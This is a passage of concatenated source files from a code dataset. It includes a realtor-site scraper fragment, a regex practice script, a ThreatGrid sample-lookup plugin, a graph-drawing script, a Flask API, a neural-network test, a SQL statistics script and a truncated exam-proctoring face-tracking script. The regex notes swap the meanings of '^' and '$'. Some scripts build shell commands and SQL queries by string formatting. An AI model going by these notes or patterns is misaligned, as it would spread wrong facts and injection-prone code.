newline=\"\") as f:\n csv_writer = csv.DictWriter(f, fieldnames=header, lineterminator='\\n')\n csv_writer.writeheader()\n \n path = \"driver\\\\chromedriver.exe\"\n driver = Chrome(executable_path=path)\n \n driver.maximize_window()\n time.sleep(2)\n \n driver.get(\"https://columbusrealtors.com/find.aspx?mode=browse&letter=\")\n parse_page(driver.page_source, driver)\n \n \n ","sub_path":"columbusrealtors/columbus.py","file_name":"columbus.py","file_ext":"py","file_size_in_byte":4357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"588246945","text":"import re\n\ntext01 = 'Grab your bow ties and bouquets! #MarriageEquality in #Illinois, officially goes into effect statewide today. #NOH8 pic.twitter.com/vhsKqiWN9f,'\n\nmentions = re.findall(r'[#]\\w*', text01)\nimages = re.findall(r'\\w{3}\\.\\w{7}\\.\\w{3}\\/.+\\w', text01)\nboundary = re.findall(r'\\pic.twitter.com/\\w+', text01)\ncase = re.findall(r'\\grab', text01, flags=re.IGNORECASE)\n\nprint('mentions: ' + str(mentions))\nprint('images: ' + str(images))\nprint('boundary: ' + str(boundary))\nprint('case: ' + str(case))\n\n'''\n\\d matches any number\n\\D matches any non number\n\\s matches any space\n\\S matches any non space\n\\w matches any letter\n\\W matches any non letter\n\\b matches word boundaries\n\n. matches anything\n\\. matches period\n\n+ matches one or more\n* matches 0 or more\n? matches 0 or 1\n\n$ matches the beginning of the string\n^ matches the end of the string\n\n[] matches anything in the brackets\n| or\n\n\nFLAGS\nflags=re.IGNORECASE\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''","sub_path":"practice/python/regex01.py","file_name":"regex01.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"162372917","text":"import komand\nfrom komand.exceptions import PluginException\nfrom .schema import SearchForSampleReportBySha256Input, SearchForSampleReportBySha256Output, Input, Output, Component\n# Custom imports below\nimport requests\n\n\nclass SearchForSampleReportBySha256(komand.Action):\n\n def __init__(self):\n super(self.__class__, self).__init__(\n name='search_for_sample_report_by_sha256',\n description=Component.DESCRIPTION,\n input=SearchForSampleReportBySha256Input(),\n output=SearchForSampleReportBySha256Output())\n\n def run(self, params={}):\n sha256 = params.get(Input.SHA256)\n\n self.logger.info(f\"Looking for sample with sha246 filename: {sha256}\")\n result = self.connection.api.search_sha256(q=sha256)\n\n try:\n results = result.get(\"data\").get(\"items\")\n except requests.HTTPError as e:\n raise PluginException(cause=\"ThreatGrid query for domain failed.\",\n assistance=f\"ThreatGrid query failed, check your API key.\\n \"\n f\"Exception returned was: {e} \\n\"\n f\"Response returned was: {result.text}\")\n\n if len(results) < 1:\n raise PluginException(cause=f\"Could not find sample with sha256 {sha256}.\",\n assistance=f\"Please check your input.\")\n\n # If someone reports a common file or URL, this will return multiple reports. I'm not sure\n # how to narrow down that result by just the hash\n report_list = []\n for result in results:\n report_list.append(result.get(\"item\"))\n\n return {Output.SAMPLE_REPORT_LIST: komand.helper.clean(report_list)}\n","sub_path":"cisco_threatgrid/icon_cisco_threatgrid/actions/search_for_sample_report_by_sha256/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"498267188","text":"#!/usr/bin/env python\n\n#~ Copyright 2014 Wieger Wesselink.\n#~ Distributed under the Boost Software License, Version 1.0.\n#~ (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)\n\nimport glob\nimport os\nimport os.path\nimport re\nimport sys\nimport yaml\nimport StringIO\n\ndef remove_ext(name):\n return re.sub(r'\\.\\w+$', '', name)\n\ndef generate_dotfile(ymlfile):\n out = StringIO.StringIO()\n out.write('digraph G {\\n')\n f = open(ymlfile)\n data = yaml.safe_load(f)\n f.close()\n tools = data['tools']\n nodes = data['nodes']\n for node in sorted(nodes):\n out.write(' %s [label=\"%s: %s\"];\\n' % (remove_ext(node), node, nodes[node]))\n toolindex = 1\n for name in tools:\n tool = tools[name]\n toolname = 'tool%d' % toolindex\n toolindex = toolindex + 1\n out.write(' %s [shape=box, label=\"%s\"];\\n' % (toolname, name + ': ' + tool['name'] + ' ' + ' '.join(tool['args'])))\n for src in tool['input']:\n out.write(' %s -> %s;\\n' % (remove_ext(src), toolname))\n for dest in tool['output']:\n out.write(' %s -> %s;\\n' % (toolname, remove_ext(dest)))\n out.write('}\\n')\n dotfile = remove_ext(ymlfile) + '.dot'\n pdffile = remove_ext(ymlfile) + '.pdf'\n with open(dotfile, 'w') as text_file:\n text_file.write(out.getvalue())\n os.system('dot -Tpdf %s -o %s' % (dotfile, pdffile))\n\nif len(sys.argv) != 2:\n print('Usage: draw where is an yml file or a directory containing yml files')\nif os.path.isdir(sys.argv[1]):\n files = glob.glob('tests/*.yml')\nelse:\n files = [sys.argv[1]]\nfor ymlfile in files:\n generate_dotfile(ymlfile)\nif len(files) == 1:\n ymlfile = files[0]\n pdffile = remove_ext(ymlfile) + '.pdf'\n os.system('evince \"%s\"' % pdffile)\n","sub_path":"newtest/python/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"113141192","text":"#\r\n# types of documents (extension of BiBTex categories)\r\n#\r\n\r\n\r\n\r\narticleType = [\r\n\"article\",\r\n\"article published in peer-reviewed journal\"\r\n]\r\n\r\nbookType = [\r\n\"book\",\r\n\"complete book\"\r\n]\r\n\r\nbookChapterType = [\r\n\"inbook\",\r\n\"chapter of book, article of encyclopedy ...\",\r\n]\r\n\r\ncourseType = [\r\n\"course\",\r\n\"on-line course\"\r\n]\r\n\r\ndataSetType = [\r\n\"dataSet\",\r\n\"experimental data\",\r\n]\r\n\r\ninProceedingsType = [\r\n\"inproceedings\",\r\n\"article or abstract published in conference \",\r\n]\r\n\r\nmanualType = [\r\n\"manual\",\r\n\"any manual or tutorial, on-line documentation ...\",\r\n]\r\n\r\nmastersThesisType = [\r\n\"mastersthesis\",\r\n\"master's thesis\",\r\n]\r\n\r\npatentType = [\r\n\"patent\",\r\n\"patent (filed or published)\",\r\n]\r\n\r\nphdThesisType = [\r\n\"phdthesis\",\r\n\"doctorate dissertation\",\r\n]\r\n\r\nposterType = [\r\n\"poster\",\r\n\"poster presented in conference, exposition ... \",\r\n]\r\n\r\npresentationType = [\r\n\"presentation\",\r\n\"public presentation, powerpoint, multimedia ...\",\r\n]\r\n\r\nproceedingsType = [\r\n\"proceedings\",\r\n\"complete proceedings of conference, workshop ...\",\r\n]\r\n\r\nprotocolType = [\r\n\"protocol\",\r\n\"test protocol = ftk doc procedure\",\r\n]\r\n\r\n\r\nsoftwareType = [\r\n\"software\",\r\n\"software setup, sources ...\",\r\n]\r\n\r\nstudentReportType = [\r\n\"studentreport\",\r\n\"student report other than master and phd\",\r\n]\r\n\r\n\r\ntechnicalReportType = [\r\n\"techreport\",\r\n\"ANY report, technical or not\",\r\n]\r\n\r\n\r\ntutorialType = [\r\n\"tutorial\",\r\n\"tutorial of laboratory equipment = ftk doc procedure\",\r\n]\r\n\r\ndocumentType = [\r\n\"document\",\r\n\"any other document\",\r\n]\r\n\r\nnonDocumentType = [\r\n\"misc\",\r\n\"any other file and/or folder\",\r\n]\r\n\r\n\r\n\r\n\r\n","sub_path":"Partie étudiant/basicKeyLogger/library/api/type_configuration.py","file_name":"type_configuration.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"348502560","text":"from utils import *\n\n# **************************************************\n# MICCAI16 MSSEG lesion segmentation challenge\n# Simple 2D approach incorporating post-procesisng\n#\n#\n# **************************************************\n\n\n\n# data options\noptions = {}\noptions['folder'] = '/home/s/w/CNN/images/CH16'\noptions['use_flair'] = True\noptions['use_pd'] = True\noptions['use_t2'] = True\noptions['use_gado'] = False\noptions['use_t1'] = True\noptions['flair'] = 'FLAIR_preprocessed.nii.gz'\noptions['pd'] = 'DP_preprocessed.nii.gz'\noptions['t2'] = 'T2_preprocessed.nii.gz'\noptions['gado'] = 'GADO_preprocessed.nii.gz'\noptions['t1'] = 'T1_preprocessed.nii.gz'\noptions['mask'] = 'Consensus.nii.gz'\noptions['out_mask'] = 'estimated_lesion_mask.nii.gz'\n\n\n# post-processing options\noptions['min_th'] = 0.5\noptions['min_lesion_size'] = 30\noptions['perc_wm'] = 0.4\n\n# net options\noptions['patch_size'] = [15,15,1]\noptions['pool_size'] = 200\noptions['patience'] = 15\noptions['net_model'] = '15_2D3'\noptions['verbose'] = 10\noptions['max_epochs'] = 100\noptions['train_split'] = 0.25\noptions['batch_size'] = 500000\noptions['train'] = False\n\noptions['net_layer'] =[\n (InputLayer, dict(name='in', shape=(None, 4, 15, 15))),\n (Conv2DDNNLayer, dict(name='conv1_1', num_filters=32, filter_size=(5,5), pad='same',W= GlorotUniform())),\n (MaxPool2DDNNLayer, dict(name='maxpool_1', pool_size=2, stride=2)), \n (Conv2DDNNLayer, dict(name='conv2_1', num_filters=64, filter_size=(5, 5), pad='same',W= GlorotUniform())),\n (MaxPool2DDNNLayer, dict(name='maxpool_2', pool_size=2, stride=2)), \n (DropoutLayer, dict(name='l2drop', p=0.5)),\n (DenseLayer, dict(name='l1', num_units=256)),\n (DenseLayer, dict(name='out', num_units=2, nonlinearity=nonlinearities.softmax)),\n ]\n\n\n\n# *****************************************************************************\n# CODE\n# *****************************************************************************\n\nclassify_images(options)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"147703492","text":"#!/usr/bin/python3\n\"\"\" Start the api \"\"\"\nfrom flask import Blueprint, Flask, jsonify\nfrom models import storage\nfrom api.v1.views import app_views\nimport os\nfrom flask_cors import CORS\n\napp = Flask(__name__)\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"0.0.0.0\"}})\napp.url_map.strict_slashes = False\napp.register_blueprint(app_views)\n\n\n@app.teardown_appcontext\ndef teardown(err):\n \"\"\" function to close storage \"\"\"\n storage.close()\n\n\n@app.errorhandler(404)\ndef pagenotfound(e):\n \"\"\" handle error 404 \"\"\"\n return jsonify({\"error\": \"Not found\"}), 404\n\nif __name__ == \"__main__\":\n host = os.environ.get('HBNB_API_HOST', '0.0.0.0')\n port = os.environ.get('HBNB_API_PORT', '5000')\n app.run(host=host, port=int(port), threaded=True)\n","sub_path":"api/v1/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"558862268","text":"# Emir Zamwa (emirz), Oblig2 INF3490\n'''\n This file was used to set in values as used in the lectures to check\n if i got correct values out. Was useful to find lot of mistakes and bugs.\n Tested with and without sigmoid. Without sigmoid resulted in the end\n with correct values compared to lectures. Tested with sigmoid, corrected\n a few mistakes here and there, and then got correct with sigmoid too.\n Changed the fails in the original mlp file as i found them here in the\n test file.\n'''\n\nimport numpy as np\nimport random\nimport copy\n\n# ****************************************************************************\nclass test:\n def __init__(self, inputs, targets, nhidden):\n self.beta = 1; self.eta = 0.1; self.momentum = 0.0\n self.inputs = inputs\n self.input_weights = []\n self.hidden_weights = []\n self.nhidden = nhidden\n self.target = targets\n\n\n for i in range(0, len(self.inputs) + 1):\n self.input_weights.append([])\n self.hidden_weights.append([])\n self.input_weights[0].append(-1)\n self.input_weights[0].append(0)\n self.input_weights[1].append(0)\n self.input_weights[1].append(1)\n self.input_weights[2].append(1)\n self.input_weights[2].append(1)\n\n self.hidden_weights[0].append(1)\n self.hidden_weights[0].append(-1)\n self.hidden_weights[1].append(0)\n self.hidden_weights[1].append(1)\n self.hidden_weights[2].append(1)\n self.hidden_weights[2].append(1)\n\n self.hidden_activations = np.zeros(2)\n self.output_activations = np.zeros(2)\n self.train(self.inputs, self.target)\n #self.forward(self.inputs)\n # ****************************************************************************\n\n # The main training method\n def train(self, inputs, targets, iterations=1):\n for iter in range(0, iterations):\n inputKopi, hiddenKopi = self.forward(inputs)\n output_deltas = [0] * 2\n hidden_deltas = [0] * self.nhidden\n old_hidden_weights = copy.deepcopy(self.hidden_weights)\n old_input_weights = copy.deepcopy(self.input_weights)\n\n # Calculating delta values for outputs in the first for loop.\n # in addition, also updating hidden weights with new ones\n for i in range(0, 2):\n delta = ((self.output_activations[i] - targets[i]) * \\\n self.output_activations[i]*(1-self.output_activations[i]))\n output_deltas[i] = delta\n for j in range(0, self.nhidden + 1):\n temp = self.hidden_weights[j][i]\n updated_weight = (temp - \\\n (self.eta * output_deltas[i] * hiddenKopi[j]))\n self.hidden_weights[j][i] = updated_weight\n\n print(output_deltas)\n\n # Calculating deltas values for hidden layer\n for i in range(0, self.nhidden):\n delta = 0\n for j in range(0, 2):\n delta += output_deltas[j] * old_hidden_weights[i][j]\n hidden_deltas[i] = (delta * \\\n self.hidden_activations[i]*(1-self.hidden_activations[i]))\n\n print(hidden_deltas)\n\n # Updating input weights\n for i in range(0, self.nhidden):\n for j in range(0, len(inputKopi)):\n temp = self.input_weights[j][i]\n updated_weight = (temp - \\\n (self.eta * hidden_deltas[i] * inputKopi[j]))\n self.input_weights[j][i] = updated_weight\n\n print(\"New hiddens: \" + str(self.hidden_activations))\n print(\"New outputs: \" + str(self.output_activations))\n print(\"New inputW: \" + str(self.input_weights))\n print(\"New hiddenW: \" + str(self.hidden_weights))\n print(\"\")\n\n # *****************************************************************************\n\n # This function clampes the list\n def clamp_values(self, outputs):\n max_value = max(outputs)\n clamped = np.zeros(len(outputs))\n\n for i in range(0, len(outputs)):\n if outputs[i] == max_value:\n clamped[i] = 1.0\n break;\n\n return clamped\n\n # *****************************************************************************\n\n '''\n This method goes from left to right of the system, and calculates the\n values of each node in the hidden layer, and also the values of the output.\n By values I mean activations.\n '''\n def forward(self, inputs):\n # Making copies of lists and adding the bias so it is included in\n # calculations of values. Thats why each for-loop goes to + 1.\n inputKopi = np.append(inputs, self.beta)\n hiddenKopi = np.append(self.hidden_activations, self.beta)\n\n for i in range(0, self.nhidden):\n value = 0.0\n for j in range(0, len(inputs) + 1):\n # Using the formula from slides to give values to hidden nodes\n value += inputKopi[j] * self.input_weights[j][i]\n self.hidden_activations[i] = value\n # Sigmoid\n for i in range(0, self.nhidden):\n self.hidden_activations[i] = (\\\n 1/(1 + np.exp(-self.beta * self.hidden_activations[i])))\n hiddenKopi[i] = self.hidden_activations[i]\n\n\n # Same principle as above, but with the outputs\n for i in range(0, 2):\n value = 0.0\n for j in range(0, self.nhidden + 1):\n value += hiddenKopi[j] * self.hidden_weights[j][i]\n self.output_activations[i] = value\n # Sigmoid\n print(\"HEI\" + str(self.output_activations))\n for i in range(0, 2):\n self.output_activations[i] = (\\\n 1/(1 + np.exp(-self.beta * self.output_activations[i])))\n\n print(\"Inputs: \" + str(self.inputs))\n print(\"Hiddens: \" + str(self.hidden_activations))\n print(\"Outputs: \" + str(self.output_activations))\n print(\"InputW: \" + str(self.input_weights))\n print(\"HiddenW: \" + str(self.hidden_weights))\n print(\"\")\n\n return inputKopi, hiddenKopi\n\ndef main():\n inputs = [0, 1]\n target = [1, 0]\n test(inputs, target, 2)\n\nmain()\n","sub_path":"Third_year/Python/Oblig2/code/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":6324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"207939498","text":"\nimport sys\nimport math\nimport mysql.connector\nfrom mysql.connector import errorcode\nimport csv\nfrom sys import *\n\n#Import the db_connections module\nimport platform as pf\nimport re\nfrom _overlapped import NULL\n\nos = pf.platform()\nif re.match(r'Windows.*', os):\n path.append('C:\\\\Users\\\\EMAAHAF\\\\Documents\\\\TestOptimization_Ericsson\\\\DBS_connections')\nelse:\n path.append('/repo/ezhuyui/test_optimizatoin_research/data_loading_module')\nimport DBS_connection_dictonaries as dc\n\n##-------------------------------------------------s\n\ndef copy_table(area, site):\n if(site == 'ALL'):\n site = ''\n else:\n site = \"_\" + site\n table_name_area = \"tar_ctc_runs_\" + area + site\n table_name_area_s = table_name_area + \"_S\"\n dc.clean_up(table_name_area_s)\n\n conn_local = dc.ini_db_connection(dc.ezh)\n cur_local = conn_local.cursor()\n try:\n query = \"CREATE TABLE %s ( SeqID int(1) AUTO_INCREMENT, Tc_Name varchar(128) NOT NULL, TmHeadline varchar(250) NOT NULL, TmID varchar(13), F_alarm int(1) DEFAULT 0, G_alarm int(1) DEFAULT 0, T_alarm int(1) DEFAULT 0, T_run int(1) DEFAULT 0, T_TR int(1) DEFAULT 0, Alarm_rate float DEFAULT 0, G_alarm_rate float DEFAULT 0, F_alarm_rate float DEFAULT 0, Precision_ float DEFAULT 0, Recall float DEFAULT 0, PRIMARY KEY (SeqID))\"%(table_name_area_s)\n cur_local.execute(query)\n \n query = \"INSERT INTO %s (Tc_Name, TmHeadline, TmID) SELECT ThcTcJavaName, TmHeadline, TmID FROM %s b GROUP BY b.ThcTcJavaName, b.TmID, b.TmHeadline\"%(table_name_area_s, table_name_area)\n cur_local.execute(query)\n \n query = \"UPDATE %s a, (SELECT ThcTcJavaName, TmHeadline, TmID, COUNT(*) c FROM %s WHERE verdict = 'FAIL' AND trID IS NULL GROUP BY ThcTcJavaName, TmID, TmHeadline) b SET a.F_alarm = b.c WHERE a.Tc_Name = b.ThcTcJavaName AND a.TmID = b.TmID AND a.TmHeadline = b.TmHeadline\"%(table_name_area_s, table_name_area)\n cur_local.execute(query)\n \n query = \"UPDATE %s a, (SELECT ThcTcJavaName, TmHeadline, TmID, COUNT(*) c FROM %s WHERE verdict = 'FAIL' AND trID IS NOT NULL GROUP BY ThcTcJavaName, TmID, TmHeadline) b SET a.G_alarm = b.c WHERE a.Tc_Name = b.ThcTcJavaName AND a.TmID = b.TmID AND a.TmHeadline = b.TmHeadline\"%(table_name_area_s, table_name_area)\n cur_local.execute(query)\n \n query = \"UPDATE %s a, (SELECT ThcTcJavaName, TmHeadline, TmID, COUNT(*) c FROM %s WHERE verdict = 'FAIL' GROUP BY ThcTcJavaName, TmID, TmHeadline) b SET a.T_alarm = b.c WHERE a.Tc_Name = b.ThcTcJavaName AND a.TmID = b. TmID AND a.TmHeadline = b.TmHeadline\"%(table_name_area_s, table_name_area)\n cur_local.execute(query)\n \n query = \"UPDATE %s a, (SELECT ThcTcJavaName, TmHeadline, TmID, COUNT(*) c FROM %s GROUP BY ThcTcJavaName, TmID, TmHeadline) b SET a.T_run = b.c WHERE a.Tc_Name = b.ThcTcJavaName AND a.TmID = b.TmID AND a.TmHeadline = b.TmHeadline\"%(table_name_area_s, table_name_area)\n cur_local.execute(query)\n \n query = \"UPDATE %s a, (SELECT ThcTcJavaName, TmHeadline, TmID, COUNT(*) c FROM %s WHERE Trid IS NOT NULL GROUP BY ThcTcJavaName, TmID, TmHeadline) b SET a.T_TR = b.c WHERE a.Tc_Name = b.ThcTcJavaName AND a.TmID = b.TmID AND a.TmHeadline = b.TmHeadline\"%(table_name_area_s, table_name_area)\n cur_local.execute(query)\n \n query = \"UPDATE %s a SET a.Alarm_rate = (a.T_alarm/a.T_run)\"%(table_name_area_s)\n cur_local.execute(query)\n query = \"UPDATE %s SET Alarm_rate = 0 WHERE Alarm_rate IS NULL\"%(table_name_area_s)\n cur_local.execute(query)\n \n query = \"UPDATE %s a SET a.G_alarm_rate = (a.G_alarm/a.T_alarm)\"%(table_name_area_s)\n cur_local.execute(query)\n query = \"UPDATE %s SET G_alarm_rate = 0 WHERE G_alarm_rate IS NULL\"%(table_name_area_s)\n cur_local.execute(query)\n \n query = \"UPDATE %s a SET a.F_alarm_rate = (a.F_alarm/a.T_alarm)\"%(table_name_area_s)\n cur_local.execute(query)\n query = \"UPDATE %s SET F_alarm_rate = 0 WHERE F_alarm_rate IS NULL\"%(table_name_area_s)\n cur_local.execute(query)\n \n query = \"UPDATE %s a SET a.Precision_ = (a.G_alarm/a.T_alarm)\"%(table_name_area_s)\n cur_local.execute(query)\n query = \"UPDATE %s SET Precision_ = 0 WHERE Precision_ IS NULL\"%(table_name_area_s)\n cur_local.execute(query)\n \n query = \"UPDATE %s a, (SELECT SUM(G_alarm) s FROM %s) b SET a.Recall = (a.G_alarm / b.s)\"%(table_name_area_s, table_name_area_s)\n cur_local.execute(query)\n query = \"UPDATE %s SET Recall = 0 WHERE Recall IS NULL\"%(table_name_area_s)\n cur_local.execute(query)\n \n \n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(err)\n \nif __name__ == \"__main__\":\n print(argv[1])\n print(argv[2])\n copy_table(argv[1],argv[2])","sub_path":"pyscripts/pyscripts_old/Area_test_stats/calculate_stats.py","file_name":"calculate_stats.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"500300557","text":"import cv2\nimport numpy as np\nimport dlib\nfrom math import hypot\nimport face_recognition\nimport time\nfrom datetime import datetime\nimport os\n\n\"\"\" global variables\n\"\"\"\nnum_frames = 0\nshort_cheating_count = 0\nlong_cheating_count = 0\n\nis_time_counting_eye = False # 눈동자 이탈 시간 측정용\nis_time_counting_head = False # 고개 이탈 시간 측정용\nis_face_compared = False # 신원인증시 진행여부 판별\n\nstart_time_eye = 0\nstart_time_head = 0\ncriteria_frame_num = 5\nwarning_count = 1\ncause = 0 # 1 : 눈동자 오른쪽\n # 2 : 눈동자 왼쪽\n # 3 : 고개 오른쪽\n # 4 : 고개 왼쪽\n # 5 : 얼굴 안보임\n # 6 : 신원인증 결과값\n # 7 : 얼굴개수 여러개\n\nno_face_time = 10 # 몇초간 얼굴 탐지 안될 시 경고할지\nmax_short_cheating = 5 # 짧은 시간 부정행위 횟수\nmax_long_cheating = 1 # 짧은 시간 부정행위 횟수\ncriteria_time = 5 # 짧은 시간 긴 시간 나누는 기준초\n\npath = \"C:/ArgosAjou/\"\npath_identification = \"C:/ArgosAjou/identification.txt\"\nfilename = \"video_\"\n\n\n\n\"\"\" determine mid point\n\"\"\"\ndef midpoint(p1, p2):\n return int((p1.x + p2.x) / 2), int((p1.y + p2.y) / 2)\n\n\n\n\"\"\" Detect face & eye's location\n and blinking\n\"\"\"\ndef get_blinking_ratio(facial_landmarks):\n left_point1 = (facial_landmarks.part(36).x, facial_landmarks.part(36).y)\n right_point1 = (facial_landmarks.part(39).x, facial_landmarks.part(39).y)\n center_top1 = midpoint(facial_landmarks.part(37), facial_landmarks.part(38))\n center_bottom1 = midpoint(facial_landmarks.part(41), facial_landmarks.part(40))\n\n left_point2 = (facial_landmarks.part(42).x, facial_landmarks.part(42).y)\n right_point2 = (facial_landmarks.part(45).x, facial_landmarks.part(45).y)\n center_top2 = midpoint(facial_landmarks.part(43), facial_landmarks.part(44))\n center_bottom2 = midpoint(facial_landmarks.part(47), facial_landmarks.part(46))\n\n ver_line_len1 = hypot((center_top1[0] - center_bottom1[0]), (center_top1[1] - center_bottom1[1]))\n hor_line_len1 = hypot((left_point1[0] - right_point1[0]), (left_point1[1] - right_point1[1]))\n ver_line_len2 = hypot((center_top2[0] - center_bottom2[0]), (center_top2[1] - center_bottom2[1]))\n hor_line_len2 = hypot((left_point2[0] - right_point2[0]), (left_point2[1] - right_point2[1]))\n\n blink_ratio_left = hor_line_len1 / ver_line_len1\n blink_ratio_right = hor_line_len2 / ver_line_len2\n blink_ratio = (blink_ratio_left + blink_ratio_right) / 2\n\n return blink_ratio\n\n\n\n\"\"\"Print face's area\n\"\"\"\ndef print_face(facial_landmarks, _gray, _frame):\n face_region = np.array([(facial_landmarks.part(0).x, facial_landmarks.part(0).y),\n (facial_landmarks.part(1).x, facial_landmarks.part(1).y),\n (facial_landmarks.part(2).x, facial_landmarks.part(2).y),\n (facial_landmarks.part(3).x, facial_landmarks.part(3).y),\n (facial_landmarks.part(4).x, facial_landmarks.part(4).y),\n (facial_landmarks.part(5).x, facial_landmarks.part(5).y),\n (facial_landmarks.part(6).x, facial_landmarks.part(6).y),\n (facial_landmarks.part(7).x, facial_landmarks.part(7).y),\n (facial_landmarks.part(8).x, facial_landmarks.part(8).y),\n (facial_landmarks.part(9).x, facial_landmarks.part(9).y),\n (facial_landmarks.part(10).x, facial_landmarks.part(10).y),\n (facial_landmarks.part(11).x, facial_landmarks.part(11).y),\n (facial_landmarks.part(12).x, facial_landmarks.part(12).y),\n (facial_landmarks.part(13).x, facial_landmarks.part(13).y),\n (facial_landmarks.part(14).x, facial_landmarks.part(14).y),\n (facial_landmarks.part(15).x, facial_landmarks.part(15).y),\n (facial_landmarks.part(16).x, facial_landmarks.part(16).y),\n (facial_landmarks.part(18).x, facial_landmarks.part(18).y),\n (facial_landmarks.part(23).x, facial_landmarks.part(23).y)], np.int32)\n\n cv2.polylines(_frame, [face_region], True, (0, 255, 255), 1)\n\n\n\n\"\"\" Detect eye's gazing\n\"\"\"\ndef get_gaze_ratio(eye_points, facial_landmarks, _gray, _frame):\n eye_region = np.array([(facial_landmarks.part(eye_points[0]).x, facial_landmarks.part(eye_points[0]).y),\n (facial_landmarks.part(eye_points[1]).x, facial_landmarks.part(eye_points[1]).y),\n (facial_landmarks.part(eye_points[2]).x, facial_landmarks.part(eye_points[2]).y),\n (facial_landmarks.part(eye_points[3]).x, facial_landmarks.part(eye_points[3]).y),\n (facial_landmarks.part(eye_points[4]).x, facial_landmarks.part(eye_points[4]).y),\n (facial_landmarks.part(eye_points[5]).x, facial_landmarks.part(eye_points[5]).y)], np.int32)\n\n cv2.polylines(_frame, [eye_region], True, (0, 255, 255), 1)\n\n height, width, _ = _frame.shape\n mask = np.zeros((height, width), np.uint8)\n cv2.polylines(mask, [eye_region], True, 255, 1)\n cv2.fillPoly(mask, [eye_region], 255)\n eye = cv2.bitwise_and(_gray, _gray, mask=mask)\n\n min_x = np.min(eye_region[:, 0])\n max_x = np.max(eye_region[:, 0])\n min_y = np.min(eye_region[:, 1])\n max_y = np.max(eye_region[:, 1])\n\n gray_eye = eye[min_y: max_y, min_x: max_x]\n _, threshold_eye = cv2.threshold(gray_eye, 70, 255, cv2.THRESH_BINARY)\n\n # 눈동자의 흰부분 계산으로 보는 방향 추정\n height, width = threshold_eye.shape\n left_side_threshold = threshold_eye[0: height, 0: int(width / 2)]\n left_side_white = cv2.countNonZero(left_side_threshold)\n right_side_threshold = threshold_eye[0: height, int(width / 2): width]\n right_side_white = cv2.countNonZero(right_side_threshold)\n\n # cv2.imshow(\"left\", left_side_threshold)\n # cv2.imshow(\"right\", right_side_threshold)\n\n # left, right side white 가 10 미만이면 눈 감은것으로 인식\n if left_side_white < 5 or right_side_white < 5:\n _gaze_ratio = 1\n else:\n _gaze_ratio = left_side_white / right_side_white\n\n return _gaze_ratio\n\n\n\n\"\"\" Detect head's direction\n\"\"\"\ndef get_head_angle_ratio(head_points, facial_landmarks, _frame):\n # 코의 가로선 표시\n nose_region1 = np.array([(facial_landmarks.part(head_points[0]).x, facial_landmarks.part(head_points[0]).y),\n (facial_landmarks.part(head_points[1]).x, facial_landmarks.part(head_points[1]).y),\n (facial_landmarks.part(head_points[2]).x, facial_landmarks.part(head_points[2]).y),\n (facial_landmarks.part(head_points[3]).x, facial_landmarks.part(head_points[3]).y)],\n np.int32)\n cv2.polylines(_frame, [nose_region1], True, (0, 255, 255), 1)\n\n # 코의 세로선 표시\n nose_region2 = np.array([(facial_landmarks.part(head_points[4]).x, facial_landmarks.part(head_points[4]).y),\n (facial_landmarks.part(head_points[5]).x, facial_landmarks.part(head_points[5]).y),\n (facial_landmarks.part(head_points[6]).x, facial_landmarks.part(head_points[6]).y),\n (facial_landmarks.part(head_points[7]).x, facial_landmarks.part(head_points[7]).y),\n (facial_landmarks.part(head_points[8]).x, facial_landmarks.part(head_points[8]).y)],\n np.int32)\n cv2.polylines(_frame, [nose_region2], True, (0, 255, 255), 1)\n\n # 코의 왼쪽 기준선 표시\n nose_line_left = np.array([(facial_landmarks.part(head_points[3]).x, facial_landmarks.part(head_points[3]).y),\n (facial_landmarks.part(head_points[4]).x, facial_landmarks.part(head_points[4]).y)],\n np.int32)\n cv2.polylines(_frame, [nose_line_left], True, (255, 0, 255), 1)\n\n # 코의 오른쪽 기준선 표시\n nose_line_right = np.array([(facial_landmarks.part(head_points[3]).x, facial_landmarks.part(head_points[3]).y),\n (facial_landmarks.part(head_points[8]).x, facial_landmarks.part(head_points[8]).y)],\n np.int32)\n cv2.polylines(_frame, [nose_line_right], True, (255, 0, 255), 1)\n\n nose_left_point = (facial_landmarks.part(head_points[4]).x, facial_landmarks.part(head_points[4]).y)\n nose_right_point = (facial_landmarks.part(head_points[8]).x, facial_landmarks.part(head_points[8]).y)\n nose_center_point = (facial_landmarks.part(head_points[3]).x, facial_landmarks.part(head_points[3]).y)\n\n # 오른쪽 기준선과 왼쪽 기준선 길이 계산\n nose_line_len1 = hypot(nose_left_point[0] - nose_center_point[0], nose_left_point[1] - nose_center_point[1])\n nose_line_len2 = hypot(nose_right_point[0] - nose_center_point[0], nose_right_point[1] - nose_center_point[1])\n\n if nose_line_len1 > nose_line_len2:\n _head_direction = \"right\"\n _direction_ratio = nose_line_len1 / nose_line_len2\n else:\n _head_direction = \"left\"\n _direction_ratio = nose_line_len2 / nose_line_len1\n\n return _head_direction, _direction_ratio\n\n\n\n\"\"\" Compare faces\n\"\"\"\n\ndef compare_faces(_frame, _num_faces, 